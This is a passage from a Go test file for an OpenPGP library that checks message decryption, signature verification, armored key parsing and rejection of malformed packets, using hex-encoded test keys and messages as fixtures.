dsaElGamalTestKeysHex,
signedEncryptedMessage2Hex,
0x33af447ccd759b09,
0xcf6a7abcd43e3673,
},
}
func TestSignedEncryptedMessage(t *testing.T) {
for i, test := range signedEncryptedMessageTests {
expected := "Signed and encrypted message\n"
kring, _ := ReadKeyRing(readerFromHex(test.keyRingHex))
prompt := func(keys []Key, symmetric bool) ([]byte, error) {
if symmetric {
t.Errorf("prompt: message was marked as symmetrically encrypted")
return nil, errors.ErrKeyIncorrect
}
if len(keys) == 0 {
t.Error("prompt: no keys requested")
return nil, errors.ErrKeyIncorrect
}
err := keys[0].PrivateKey.Decrypt([]byte("passphrase"))
if err != nil {
t.Errorf("prompt: error decrypting key: %s", err)
return nil, errors.ErrKeyIncorrect
}
return nil, nil
}
md, err := ReadMessage(readerFromHex(test.messageHex), kring, prompt, nil)
if err != nil {
t.Errorf("#%d: error reading message: %s", i, err)
return
}
if !md.IsSigned || md.SignedByKeyId != test.signedByKeyId || md.SignedBy == nil || !md.IsEncrypted || md.IsSymmetricallyEncrypted || len(md.EncryptedToKeyIds) == 0 || md.EncryptedToKeyIds[0] != test.encryptedToKeyId {
t.Errorf("#%d: bad MessageDetails: %#v", i, md)
}
contents, err := ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Errorf("#%d: error reading UnverifiedBody: %s", i, err)
}
if string(contents) != expected {
t.Errorf("#%d: bad UnverifiedBody got:%s want:%s", i, string(contents), expected)
}
if md.SignatureError != nil || md.Signature == nil {
t.Errorf("#%d: failed to validate: %s", i, md.SignatureError)
}
}
}
func TestUnspecifiedRecipient(t *testing.T) {
expected := "Recipient unspecified\n"
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2PrivateHex))
md, err := ReadMessage(readerFromHex(recipientUnspecifiedHex), kring, nil, nil)
if err != nil {
t.Errorf("error reading message: %s", err)
return
}
contents, err := ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Errorf("error reading UnverifiedBody: %s", err)
}
if string(contents) != expected {
t.Errorf("bad UnverifiedBody got:%s want:%s", string(contents), expected)
}
}
func TestSymmetricallyEncrypted(t *testing.T) {
firstTimeCalled := true
prompt := func(keys []Key, symmetric bool) ([]byte, error) {
if len(keys) != 0 {
t.Errorf("prompt: len(keys) = %d (want 0)", len(keys))
}
if !symmetric {
t.Errorf("symmetric is not set")
}
if firstTimeCalled {
firstTimeCalled = false
return []byte("wrongpassword"), nil
}
return []byte("password"), nil
}
md, err := ReadMessage(readerFromHex(symmetricallyEncryptedCompressedHex), nil, prompt, nil)
if err != nil {
t.Errorf("ReadMessage: %s", err)
return
}
contents, err := ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Errorf("ReadAll: %s", err)
}
expectedCreationTime := uint32(1295992998)
if md.LiteralData.Time != expectedCreationTime {
t.Errorf("LiteralData.Time is %d, want %d", md.LiteralData.Time, expectedCreationTime)
}
const expected = "Symmetrically encrypted.\n"
if string(contents) != expected {
t.Errorf("contents got: %s want: %s", string(contents), expected)
}
}
func testDetachedSignature(t *testing.T, kring KeyRing, signature io.Reader, sigInput, tag string, expectedSignerKeyId uint64) {
signed := bytes.NewBufferString(sigInput)
signer, err := CheckDetachedSignature(kring, signed, signature)
if err != nil {
t.Errorf("%s: signature error: %s", tag, err)
return
}
if signer == nil {
t.Errorf("%s: signer is nil", tag)
return
}
if signer.PrimaryKey.KeyId != expectedSignerKeyId {
t.Errorf("%s: wrong signer got:%x want:%x", tag, signer.PrimaryKey.KeyId, expectedSignerKeyId)
}
}
func TestDetachedSignature(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
testDetachedSignature(t, kring, readerFromHex(detachedSignatureHex), signedInput, "binary", testKey1KeyId)
testDetachedSignature(t, kring, readerFromHex(detachedSignatureTextHex), signedInput, "text", testKey1KeyId)
testDetachedSignature(t, kring, readerFromHex(detachedSignatureV3TextHex), signedInput, "v3", testKey1KeyId)
incorrectSignedInput := signedInput + "X"
_, err := CheckDetachedSignature(kring, bytes.NewBufferString(incorrectSignedInput), readerFromHex(detachedSignatureHex))
if err == nil {
t.Fatal("CheckDetachedSignature returned without error for bad signature")
}
if err == errors.ErrUnknownIssuer {
t.Fatal("CheckDetachedSignature returned ErrUnknownIssuer when the signer was known, but the signature invalid")
}
}
func TestDetachedSignatureDSA(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(dsaTestKeyHex))
testDetachedSignature(t, kring, readerFromHex(detachedSignatureDSAHex), signedInput, "binary", testKey3KeyId)
}
func TestMultipleSignaturePacketsDSA(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(dsaTestKeyHex))
testDetachedSignature(t, kring, readerFromHex(missingHashFunctionHex+detachedSignatureDSAHex), signedInput, "binary", testKey3KeyId)
}
func TestDetachedSignatureP256(t *testing.T) {
kring, _ := ReadKeyRing(readerFromHex(p256TestKeyHex))
testDetachedSignature(t, kring, readerFromHex(detachedSignatureP256Hex), signedInput, "binary", testKeyP256KeyId)
}
func testHashFunctionError(t *testing.T, signatureHex string) {
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
_, err := CheckDetachedSignature(kring, nil, readerFromHex(signatureHex))
if err == nil {
t.Fatal("Packet with bad hash type was correctly parsed")
}
unsupported, ok := err.(errors.UnsupportedError)
if !ok {
t.Fatalf("Unexpected class of error: %s", err)
}
if !strings.Contains(string(unsupported), "hash ") {
t.Fatalf("Unexpected error: %s", err)
}
}
func TestUnknownHashFunction(t *testing.T) {
// unknownHashFunctionHex contains a signature packet with hash
// function type 153 (which isn't a real hash function id).
testHashFunctionError(t, unknownHashFunctionHex)
}
func TestMissingHashFunction(t *testing.T) {
// missingHashFunctionHex contains a signature packet that uses
// RIPEMD160, which isn't compiled in. Since that's the only signature
// packet we don't find any suitable packets and end up with ErrUnknownIssuer
kring, _ := ReadKeyRing(readerFromHex(testKeys1And2Hex))
_, err := CheckDetachedSignature(kring, nil, readerFromHex(missingHashFunctionHex))
if err == nil {
t.Fatal("Packet with missing hash type was correctly parsed")
}
if err != errors.ErrUnknownIssuer {
t.Fatalf("Unexpected class of error: %s", err)
}
}
func TestReadingArmoredPrivateKey(t *testing.T) {
el, err := ReadArmoredKeyRing(bytes.NewBufferString(armoredPrivateKeyBlock))
if err != nil {
t.Error(err)
}
if len(el) != 1 {
t.Errorf("got %d entities, wanted 1\n", len(el))
}
}
func TestReadingArmoredPublicKey(t *testing.T) {
el, err := ReadArmoredKeyRing(bytes.NewBufferString(e2ePublicKey))
if err != nil {
t.Error(err)
}
if len(el) != 1 {
t.Errorf("didn't get a valid entity")
}
}
func TestNoArmoredData(t *testing.T) {
_, err := ReadArmoredKeyRing(bytes.NewBufferString("foo"))
if _, ok := err.(errors.InvalidArgumentError); !ok {
t.Errorf("error was not an InvalidArgumentError: %s", err)
}
}
func testReadMessageError(t *testing.T, messageHex string) {
buf, err := hex.DecodeString(messageHex)
if err != nil {
t.Errorf("hex.DecodeString(): %v", err)
}
kr, err := ReadKeyRing(new(bytes.Buffer))
if err != nil {
t.Errorf("ReadKeyring(): %v", err)
}
_, err = ReadMessage(bytes.NewBuffer(buf), kr,
func([]Key, bool) ([]byte, error) {
return []byte("insecure"), nil
}, nil)
if err == nil {
t.Errorf("ReadMessage(): Unexpected nil error")
}
}
func TestIssue11503(t *testing.T) {
testReadMessageError(t, "8c040402000aa430aa8228b9248b01fc899a91197130303030")
}
func TestIssue11504(t *testing.T) {
testReadMessageError(t, "9303000130303030303030303030983002303030303030030000000130")
}
// TestSignatureV3Message tests the verification of V3 signature, generated
// with a modern V4-style key. Some people have their clients set to generate
// V3 signatures, so it's useful to be able to verify them.
func TestSignatureV3Message(t *testing.T) {
sig, err := armor.Decode(strings.NewReader(signedMessageV3))
if err != nil {
t.Error(err)
return
}
key, err := ReadArmoredKeyRing(strings.NewReader(keyV4forVerifyingSignedMessageV3))
if err != nil {
t.Error(err)
return
}
md, err := ReadMessage(sig.Body, key, nil, nil)
if err != nil {
t.Error(err)
return
}
_, err = ioutil.ReadAll(md.UnverifiedBody)
if err != nil {
t.Error(err)
return
}
// We'll see a sig error here after reading in the UnverifiedBody above,
// if there was one to see.
if err = md.SignatureError; err != nil {
t.Error(err)
return
}
if md.SignatureV3 == nil {
t.Errorf("No available signature after checking signature")
return
}
if md.Signature != nil {
t.Errorf("Did not expect a signature V4 back")
return
}
return
}
const testKey1KeyId = 0xA34D7E18C20C31BB
const testKey3KeyId = 0x338934250CCC0360
const testKeyP256KeyId = 0xd44a2c495918513e
const signedInput = "Signed message\nline 2\nline 3\n"
const signedTextInput = "Signed message\r\nline 2\r\nline 3\r\n"
const recipientUnspecifiedHex = "848c0300000000000000000103ff62d4d578d03cf40c3da998dfe216c074fa6ddec5e31c197c9666ba292830d91d18716a80f699f9d897389a90e6d62d0238f5f07a5248073c0f24920e4bc4a30c2d17ee4e0cae7c3d4aaa4e8dced50e3010a80ee692175fa0385f62ecca4b56ee6e9980aa3ec51b61b077096ac9e800edaf161268593eedb6cc7027ff5cb32745d250010d407a6221ae22ef18469b444f2822478c4d190b24d36371a95cb40087cdd42d9399c3d06a53c0673349bfb607927f20d1e122bde1e2bf3aa6cae6edf489629bcaa0689539ae3b718914d88ededc3b"
const detachedSignatureHex = "889c04000102000605024d449cd1000a0910a34d7e18c20c31bb167603ff57718d09f28a519fdc7b5a68b6a3336da04df85e38c5cd5d5bd2092fa4629848a33d85b1729402a2aab39c3ac19f9d573f773cc62c264dc924c067a79dfd8a863ae06c7c8686120760749f5fd9b1e03a64d20a7df3446ddc8f0aeadeaeba7cbaee5c1e366d65b6a0c6cc749bcb912d2f15013f812795c2e29eb7f7b77f39ce77"
const detachedSignatureTextHex = "889c04010102000605024d449d21000a0910a34d7e18c20c31bbc8c60400a24fbef7342603a41cb1165767bd18985d015fb72fe05db42db36cfb2f1d455967f1e491194fbf6cf88146222b23bf6ffbd50d17598d976a0417d3192ff9cc0034fd00f287b02e90418bbefe609484b09231e4e7a5f3562e199bf39909ab5276c4d37382fe088f6b5c3426fc1052865da8b3ab158672d58b6264b10823dc4b39"
const detachedSignatureV3TextHex = "8900950305005255c25ca34d7e18c20c31bb0102bb3f04009f6589ef8a028d6e54f6eaf25432e590d31c3a41f4710897585e10c31e5e332c7f9f409af8512adceaff24d0da1474ab07aa7bce4f674610b010fccc5b579ae5eb00a127f272fb799f988ab8e4574c141da6dbfecfef7e6b2c478d9a3d2551ba741f260ee22bec762812f0053e05380bfdd55ad0f22d8cdf71b233fe51ae8a24"
const detachedSignatureDSAHex = "884604001102000605024d6c4eac000a0910338934250ccc0360f18d00a087d743d6405ed7b87755476629600b8b694a39e900a0abff8126f46faf1547c1743c37b21b4ea15b8f83"
const detachedSignatureP256Hex = "885e0400130a0006050256e5bb00000a0910d44a2c495918513edef001009841a4f792beb0befccb35c8838a6a87d9b936beaa86db6745ddc7b045eee0cf00fd1ac1f78306b17e965935dd3f8bae4587a76587e4af231efe19cc4011a8434817"
const testKeys1And2Hex = "988d044d3c5c10010400b1d13382944bd5aba23a4312968b5095d14f947f600eb478e14a6fcb16b0e0cac764884909c020bc495cfcc39a935387c661507bdb236a0612fb582cac3af9b29cc2c8c70090616c41b662f4da4c1201e195472eb7f4ae1ccbcbf9940fe21d985e379a5563dde5b9a23d35f1cfaa5790da3b79db26f23695107bfaca8e7b5bcd0011010001b41054657374204b6579203120285253412988b804130102002205024d3c5c10021b03060b090807030206150802090a0b0416020301021e01021780000a0910a34d7e18c20c31bbb5b304009cc45fe610b641a2c146331be94dade0a396e73ca725e1b25c21708d9cab46ecca5ccebc23055879df8f99eea39b377962a400f2ebdc36a7c99c333d74aeba346315137c3ff9d0a09b0273299090343048afb8107cf94cbd1400e3026f0ccac7ecebbc4d78588eb3e478fe2754d3ca664bcf3eac96ca4a6b0c8d7df5102f60f6b0020003b88d044d3c5c10010400b201df61d67487301f11879d514f4248ade90c8f68c7af1284c161098de4c28c2850f1ec7b8e30f959793e571542ffc6532189409cb51c3d30dad78c4ad5165eda18b20d9826d8707d0f742e2ab492103a85bbd9ddf4f5720f6de7064feb0d39ee002219765bb07bcfb8b877f47abe270ddeda4f676108cecb6b9bb2ad484a4f0011010001889f04180102000905024d3c5c10021b0c000a0910a34d7e18c20c31bb1a03040085c8d62e16d05dc4e9dad64953c8a2eed8b6c12f92b1575eeaa6dcf7be9473dd5b24b37b6dffbb4e7c99ed1bd3cb11634be19b3e6e207bed7505c7ca111ccf47cb323bf1f8851eb6360e8034cbff8dd149993c959de89f8f77f38e7e98b8e3076323aa719328e2b408db5ec0d03936efd57422ba04f925cdc7b4c1af7590e40ab0020003988d044d3c5c33010400b488c3e5f83f4d561f317817538d9d0397981e9aef1321ca68ebfae1cf8b7d388e19f4b5a24a82e2fbbf1c6c26557a6c5845307a03d815756f564ac7325b02bc83e87d5480a8fae848f07cb891f2d51ce7df83dcafdc12324517c86d472cc0ee10d47a68fd1d9ae49a6c19bbd36d82af597a0d88cc9c49de9df4e696fc1f0b5d0011010001b42754657374204b6579203220285253412c20656e637279707465642070726976617465206b65792988b804130102002205024d3c5c33021b03060b090807030206150802090a0b0416020301021e01021780000a0910d4984f961e35246b98940400908a73b6a6169f700434f076c6c79015a49bee37130eaf23aaa3cfa9ce60bfe4acaa7bc95f1146ada5867e0079babb38804891f4f0b8ebca57a86b249dee786161a755b7a342e68ccf3f78ed6440a93a6626beb9a37aa66afcd4f888790cb4bb46d94a4ae3eb3d7d3e6b00f6bfec940303e89ec5b32a1eaaacce66497d539328b0020003b88d044d3c5c33010400a4e913f9442abcc7f1804ccab27d2f787ffa592077ca935a8bb23165bd8d57576acac647cc596b2c3f814518cc8c82953c7a4478f32e0cf645630a5ba38d9618ef2bc3add69d459ae3dece5cab778938d988239f8c5ae437807075e06c828019959c644ff05ef6a5a1dab72227c98e3a040b0cf219026640698d7a13d8538a570011010001889f04180102000905024d3c5c33021b0c000a0910d4984f961e35246b26c703ff7ee29ef53bc1ae1ead533c408fa136db508434e233d6e62be621e031e5940bbd4c08142aed0f82217e7c3e1ec8de574bc06ccf3c36633be41ad78a9eacd209f861cae7b064100758545cc9dd83db71806dc1cfd5fb9ae5c7474bba0c19c44034ae61bae5eca379383339dece94ff56ff7aa44a582f3e5c38f45763af577c0934b0020003"
const testKeys1And2PrivateHex = "9501d8044d3c5c10010400b1d13382944bd5aba23a4312968b5095d14f947f600eb478e14a6fcb16b0e0cac764884909c020bc495cfcc39a935387c661507bdb236a0612fb582cac3af9b29cc2c8c70090616c41b662f4da4c1201e195472eb7f4ae1ccbcbf9940fe21d985e379a5563dde5b9a23d35f1cfaa5790da3b79db26f23695107bfaca8e7b5bcd00110100010003ff4d91393b9a8e3430b14d6209df42f98dc927425b881f1209f319220841273a802a97c7bdb8b3a7740b3ab5866c4d1d308ad0d3a79bd1e883aacf1ac92dfe720285d10d08752a7efe3c609b1d00f17f2805b217be53999a7da7e493bfc3e9618fd17018991b8128aea70a05dbce30e4fbe626aa45775fa255dd9177aabf4df7cf0200c1ded12566e4bc2bb590455e5becfb2e2c9796482270a943343a7835de41080582c2be3caf5981aa838140e97afa40ad652a0b544f83eb1833b0957dce26e47b0200eacd6046741e9ce2ec5beb6fb5e6335457844fb09477f83b050a96be7da043e17f3a9523567ed40e7a521f818813a8b8a72209f1442844843ccc7eb9805442570200bdafe0438d97ac36e773c7162028d65844c4d463e2420aa2228c6e50dc2743c3d6c72d0d782a5173fe7be2169c8a9f4ef8a7cf3e37165e8c61b89c346cdc6c1799d2b41054657374204b6579203120285253412988b804130102002205024d3c5c10021b03060b090807030206150802090a0b0416020301021e01021780000a0910a34d7e18c20c31bbb5b304009cc45fe610b641a2c146331be94dade0a396e73ca725e1b25c21708d9cab46ecca5ccebc23055879df8f99eea39b377962a400f2ebdc36a7c99c333d74aeba346315137c3ff9d0a09b0273299090343048afb8107cf94cbd1400e3026f0ccac7ecebbc4d78588eb3e478fe2754d3ca664bcf3eac96ca4a6b0c8d7df5102f60f6b00200009d01d8044d3c5c10010400b201df61d67487301f11879d514f4248ade90c8f68c7af1284c161098de4c28c2850f1ec7b8e30f959793e571542ffc6532189409cb51c3d30dad78c4ad5165eda18b20d9826d8707d0f742e2ab492103a85bbd9ddf4f5720f6de7064feb0d39ee002219765bb07bcfb8b877f47abe270ddeda4f676108cecb6b9bb2ad484a4f00110100010003fd17a7490c22a79c59281fb7b20f5e6553ec0c1637ae382e8adaea295f50241037f8997cf42c1ce26417e015091451b15424b2c59eb8d4161b0975630408e394d3b00f88d4b4e18e2cc85e8251d4753a27c639c83f5ad4a571c4f19d7cd460b9b73c25ade730c99df09637bd173d8e3e981ac64432078263bb6dc30d3e974150dd0200d0ee05be3d4604d2146fb0457f31ba17c057560785aa804e8ca5530a7cd81d3440d0f4ba6851efcfd3954b7e68908fc0ba47f7ac37bf559c6c168b70d3a7c8cd0200da1c677c4bce06a068070f2b3733b0a714e88d62aa3f9a26c6f5216d48d5c2b5624144f3807c0df30be66b3268eeeca4df1fbded58faf49fc95dc3c35f134f8b01fd1396b6c0fc1b6c4f0eb8f5e44b8eace1e6073e20d0b8bc5385f86f1cf3f050f66af789f3ef1fc107b7f4421e19e0349c730c68f0a226981f4e889054fdb4dc149e8e889f04180102000905024d3c5c10021b0c000a0910a34d7e18c20c31bb1a03040085c8d62e16d05dc4e9dad64953c8a2eed8b6c12f92b1575eeaa6dcf7be9473dd5b24b37b6dffbb4e7c99ed1bd3cb11634be19b3e6e207bed7505c7ca111ccf47cb323bf1f8851eb6360e8034cbff8dd149993c959de89f8f77f38e7e98b8e3076323aa719328e2b408db5ec0d03936efd57422ba04f925cdc7b4c1af7590e40ab00200009501fe044d3c5c33010400b488c3e5f83f4d561f317817538d9d0397981e9aef1321ca68ebfae1cf8b7d388e19f4b5a24a82e2fbbf1c6c26557a6c5845307a03d815756f564ac7325b02bc83e87d5480a8fae848f07cb891f2d51ce7df83dcafdc12324517c86d472cc0ee10d47a68fd1d9ae49a6c19bbd36d82af597a0d88cc9c49de9df4e696fc1f0b5d0011010001fe030302e9030f3c783e14856063f16938530e148bc57a7aa3f3e4f90df9dceccdc779bc0835e1ad3d006e4a8d7b36d08b8e0de5a0d947254ecfbd22037e6572b426bcfdc517796b224b0036ff90bc574b5509bede85512f2eefb520fb4b02aa523ba739bff424a6fe81c5041f253f8d757e69a503d3563a104d0d49e9e890b9d0c26f96b55b743883b472caa7050c4acfd4a21f875bdf1258d88bd61224d303dc9df77f743137d51e6d5246b88c406780528fd9a3e15bab5452e5b93970d9dcc79f48b38651b9f15bfbcf6da452837e9cc70683d1bdca94507870f743e4ad902005812488dd342f836e72869afd00ce1850eea4cfa53ce10e3608e13d3c149394ee3cbd0e23d018fcbcb6e2ec5a1a22972d1d462ca05355d0d290dd2751e550d5efb38c6c89
686344df64852bf4ff86638708f644e8ec6bd4af9b50d8541cb91891a431326ab2e332faa7ae86cfb6e0540aa63160c1e5cdd5a4add518b303fff0a20117c6bc77f7cfbaf36b04c865c6c2b42754657374204b6579203220285253412c20656e637279707465642070726976617465206b65792988b804130102002205024d3c5c33021b03060b090807030206150802090a0b0416020301021e01021780000a0910d4984f961e35246b98940400908a73b6a6169f700434f076c6c79015a49bee37130eaf23aaa3cfa9ce60bfe4acaa7bc95f1146ada5867e0079babb38804891f4f0b8ebca57a86b249dee786161a755b7a342e68ccf3f78ed6440a93a6626beb9a37aa66afcd4f888790cb4bb46d94a4ae3eb3d7d3e6b00f6bfec940303e89ec5b32a1eaaacce66497d539328b00200009d01fe044d3c5c33010400a4e913f9442abcc7f1804ccab27d2f787ffa592077ca935a8bb23165bd8d57576acac647cc596b2c3f814518cc8c82953c7a4478f32e0cf645630a5ba38d9618ef2bc3add69d459ae3dece5cab778938d988239f8c5ae437807075e06c828019959c644ff05ef6a5a1dab72227c98e3a040b0cf219026640698d7a13d8538a570011010001fe030302e9030f3c783e148560f936097339ae381d63116efcf802ff8b1c9360767db5219cc987375702a4123fd8657d3e22700f23f95020d1b261eda5257e9a72f9a918e8ef22dd5b3323ae03bbc1923dd224db988cadc16acc04b120a9f8b7e84da9716c53e0334d7b66586ddb9014df604b41be1e960dcfcbc96f4ed150a1a0dd070b9eb14276b9b6be413a769a75b519a53d3ecc0c220e85cd91ca354d57e7344517e64b43b6e29823cbd87eae26e2b2e78e6dedfbb76e3e9f77bcb844f9a8932eb3db2c3f9e44316e6f5d60e9e2a56e46b72abe6b06dc9a31cc63f10023d1f5e12d2a3ee93b675c96f504af0001220991c88db759e231b3320dcedf814dcf723fd9857e3d72d66a0f2af26950b915abdf56c1596f46a325bf17ad4810d3535fb02a259b247ac3dbd4cc3ecf9c51b6c07cebb009c1506fba0a89321ec8683e3fd009a6e551d50243e2d5092fefb3321083a4bad91320dc624bd6b5dddf93553e3d53924c05bfebec1fb4bd47e89a1a889f04180102000905024d3c5c33021b0c000a0910d4984f961e35246b26c703ff7ee29ef53bc1ae1ead533c408fa136db508434e233d6e62be621e031e5940bbd4c08142aed0f82217e7c3e1ec8de574bc06ccf3c36633be41ad78a9eacd209f861cae7b064100758545cc9dd83db71806dc1cfd5fb9ae5c7474bba0c19c44034ae61bae5eca379383339dece94ff56ff7aa44a582f3e5c38f45763af577c0934b0020000"
const dsaElGamalTestKeysHex = "9501e1044dfcb16a110400aa3e5c1a1f43dd28c2ffae8abf5cfce555ee874134d8ba0a0f7b868ce2214beddc74e5e1e21ded354a95d18acdaf69e5e342371a71fbb9093162e0c5f3427de413a7f2c157d83f5cd2f9d791256dc4f6f0e13f13c3302af27f2384075ab3021dff7a050e14854bbde0a1094174855fc02f0bae8e00a340d94a1f22b32e48485700a0cec672ac21258fb95f61de2ce1af74b2c4fa3e6703ff698edc9be22c02ae4d916e4fa223f819d46582c0516235848a77b577ea49018dcd5e9e15cff9dbb4663a1ae6dd7580fa40946d40c05f72814b0f88481207e6c0832c3bded4853ebba0a7e3bd8e8c66df33d5a537cd4acf946d1080e7a3dcea679cb2b11a72a33a2b6a9dc85f466ad2ddf4c3db6283fa645343286971e3dd700703fc0c4e290d45767f370831a90187e74e9972aae5bff488eeff7d620af0362bfb95c1a6c3413ab5d15a2e4139e5d07a54d72583914661ed6a87cce810be28a0aa8879a2dd39e52fb6fe800f4f181ac7e328f740cde3d09a05cecf9483e4cca4253e60d4429ffd679d9996a520012aad119878c941e3cf151459873bdfc2a9563472fe0303027a728f9feb3b864260a1babe83925ce794710cfd642ee4ae0e5b9d74cee49e9c67b6cd0ea5dfbb582132195a121356a1513e1bca73e5b80c58c7ccb4164453412f456c47616d616c2054657374204b65792031886204131102002205024dfcb16a021b03060b090807030206150802090a0b0416020301021e01021780000a091033af447ccd759b09fadd00a0b8fd6f5a790bad7e9f2dbb7632046dc4493588db009c087c6a9ba9f7f49fab221587a74788c00db4889ab00200009d0157044dfcb16a1004008dec3f9291205255ccff8c532318133a6840739dd68b03ba942676f9038612071447bf07d00d559c5c0875724ea16a4c774f80d8338b55fca691a0522e530e604215b467bbc9ccfd483a1da99d7bc2648b4318fdbd27766fc8bfad3fddb37c62b8ae7ccfe9577e9b8d1e77c1d417ed2c2ef02d52f4da11600d85d3229607943700030503ff506c94c87c8cab778e963b76cf63770f0a79bf48fb49d3b4e52234620fc9f7657f9f8d56c96a2b7c7826ae6b57ebb2221a3fe154b03b6637cea7e6d98e3e45d87cf8dc432f723d3d71f89c5192ac8d7290684d2c25ce55846a80c9a7823f6acd9bb29fa6cd71f20bc90eccfca20451d0c976e460e672b000df49466408d527affe0303027a728f9feb3b864260abd761730327bca2aaa4ea0525c175e92bf240682a0e83b226f97ecb2e935b62c9a133858ce31b271fa8eb41f6a1b3cd72a63025ce1a75ee4180dcc284884904181102000905024dfcb16a021b0c000a091033af447ccd759b09dd0b009e3c3e7296092c81bee5a19929462caaf2fff3ae26009e218c437a2340e7ea628149af1ec98ec091a43992b00200009501e1044dfcb1be1104009f61faa61aa43df75d128cbe53de528c4aec49ce9360c992e70c77072ad5623de0a3a6212771b66b39a30dad6781799e92608316900518ec01184a85d872365b7d2ba4bacfb5882ea3c2473d3750dc6178cc1cf82147fb58caa28b28e9f12f6d1efcb0534abed644156c91cca4ab78834268495160b2400bc422beb37d237c2300a0cac94911b6d493bda1e1fbc6feeca7cb7421d34b03fe22cec6ccb39675bb7b94a335c2b7be888fd3906a1125f33301d8aa6ec6ee6878f46f73961c8d57a3e9544d8ef2a2cbfd4d52da665b1266928cfe4cb347a58c412815f3b2d2369dec04b41ac9a71cc9547426d5ab941cccf3b18575637ccfb42df1a802df3cfe0a999f9e7109331170e3a221991bf868543960f8c816c28097e503fe319db10fb98049f3a57d7c80c420da66d56f3644371631fad3f0ff4040a19a4fedc2d07727a1b27576f75a4d28c47d8246f27071e12d7a8de62aad216ddbae6aa02efd6b8a3e2818cda48526549791ab277e447b3a36c57cefe9b592f5eab73959743fcc8e83cbefec03a329b55018b53eec196765ae40ef9e20521a603c551efe0303020950d53a146bf9c66034d00c23130cce95576a2ff78016ca471276e8227fb30b1ffbd92e61804fb0c3eff9e30b1a826ee8f3e4730b4d86273ca977b4164453412f456c47616d616c2054657374204b65792032886204131102002205024dfcb1be021b03060b090807030206150802090a0b0416020301021e01021780000a0910a86bf526325b21b22bd9009e34511620415c974750a20df5cb56b182f3b48e6600a0a9466cb1a1305a84953445f77d461593f1d42bc1b00200009d0157044dfcb1be1004009565a951da1ee87119d600c077198f1c1bceb0f7aa54552489298e41ff788fa8f0d43a69871f0f6f77ebdfb14a4260cf9fbeb65d5844b4272a1904dd95136d06c3da745dc46327dd44a0f16f60135914368c8039a34033862261806bb2c5ce1152e284025469
7872c85441ccb7321431d75a747a4bfb1d2c66362b51ce76311700030503fc0ea76601c196768070b7365a200e6ddb09307f262d5f39eec467b5f5784e22abdf1aa49226f59ab37cb49969d8f5230ea65caf56015abda62604544ed526c5c522bf92bed178a078789f6c807b6d34885688024a5bed9e9f8c58d11d4b82487b44c5f470c5606806a0443b79cadb45e0f897a561a53f724e5349b9267c75ca17fe0303020950d53a146bf9c660bc5f4ce8f072465e2d2466434320c1e712272fafc20e342fe7608101580fa1a1a367e60486a7cd1246b7ef5586cf5e10b32762b710a30144f12dd17dd4884904181102000905024dfcb1be021b0c000a0910a86bf526325b21b2904c00a0b2b66b4b39ccffda1d10f3ea8d58f827e30a8b8e009f4255b2d8112a184e40cde43a34e8655ca7809370b0020000"
const signedMessageHex = "a3019bc0cbccc0c4b8d8b74ee2108fe16ec6d3ca490cbe362d3f8333d3f352531472538b8b13d353b97232f352158c20943157c71c16064626063656269052062e4e01987e9b6fccff4b7df3a34c534b23e679cbec3bc0f8f6e64dfb4b55fe3f8efa9ce110ddb5cd79faf1d753c51aecfa669f7e7aa043436596cccc3359cb7dd6bbe9ecaa69e5989d9e57209571edc0b2fa7f57b9b79a64ee6e99ce1371395fee92fec2796f7b15a77c386ff668ee27f6d38f0baa6c438b561657377bf6acff3c5947befd7bf4c196252f1d6e5c524d0300"
const signedTextMessageHex = "a3019bc0cbccc8c4b8d8b74ee2108fe16ec6d36a250cbece0c178233d3f352531472538b8b13d35379b97232f352158ca0b4312f57c71c1646462606365626906a062e4e019811591798ff99bf8afee860b0d8a8c2a85c3387e3bcf0bb3b17987f2bbcfab2aa526d930cbfd3d98757184df3995c9f3e7790e36e3e9779f06089d4c64e9e47dd6202cb6e9bc73c5d11bb59fbaf89d22d8dc7cf199ddf17af96e77c5f65f9bbed56f427bd8db7af37f6c9984bf9385efaf5f184f986fb3e6adb0ecfe35bbf92d16a7aa2a344fb0bc52fb7624f0200"
const signedEncryptedMessageHex = "848c032a67d68660df41c70103ff5789d0de26b6a50c985a02a13131ca829c413a35d0e6fa8d6842599252162808ac7439c72151c8c6183e76923fe3299301414d0c25a2f06a2257db3839e7df0ec964773f6e4c4ac7ff3b48c444237166dd46ba8ff443a5410dc670cb486672fdbe7c9dfafb75b4fea83af3a204fe2a7dfa86bd20122b4f3d2646cbeecb8f7be8d2c03b018bd210b1d3791e1aba74b0f1034e122ab72e760492c192383cf5e20b5628bd043272d63df9b923f147eb6091cd897553204832aba48fec54aa447547bb16305a1024713b90e77fd0065f1918271947549205af3c74891af22ee0b56cd29bfec6d6e351901cd4ab3ece7c486f1e32a792d4e474aed98ee84b3f591c7dff37b64e0ecd68fd036d517e412dcadf85840ce184ad7921ad446c4ee28db80447aea1ca8d4f574db4d4e37688158ddd19e14ee2eab4873d46947d65d14a23e788d912cf9a19624ca7352469b72a83866b7c23cb5ace3deab3c7018061b0ba0f39ed2befe27163e5083cf9b8271e3e3d52cc7ad6e2a3bd81d4c3d7022f8d"
const signedEncryptedMessage2Hex = "85010e03cf6a7abcd43e36731003fb057f5495b79db367e277cdbe4ab90d924ddee0c0381494112ff8c1238fb0184af35d1731573b01bc4c55ecacd2aafbe2003d36310487d1ecc9ac994f3fada7f9f7f5c3a64248ab7782906c82c6ff1303b69a84d9a9529c31ecafbcdb9ba87e05439897d87e8a2a3dec55e14df19bba7f7bd316291c002ae2efd24f83f9e3441203fc081c0c23dc3092a454ca8a082b27f631abf73aca341686982e8fbda7e0e7d863941d68f3de4a755c2964407f4b5e0477b3196b8c93d551dd23c8beef7d0f03fbb1b6066f78907faf4bf1677d8fcec72651124080e0b7feae6b476e72ab207d38d90b958759fdedfc3c6c35717c9dbfc979b3cfbbff0a76d24a5e57056bb88acbd2a901ef64bc6e4db02adc05b6250ff378de81dca18c1910ab257dff1b9771b85bb9bbe0a69f5989e6d1710a35e6dfcceb7d8fb5ccea8db3932b3d9ff3fe0d327597c68b3622aec8e3716c83a6c93f497543b459b58ba504ed6bcaa747d37d2ca746fe49ae0a6ce4a8b694234e941b5159ff8bd34b9023da2814076163b86f40eed7c9472f81b551452d5ab87004a37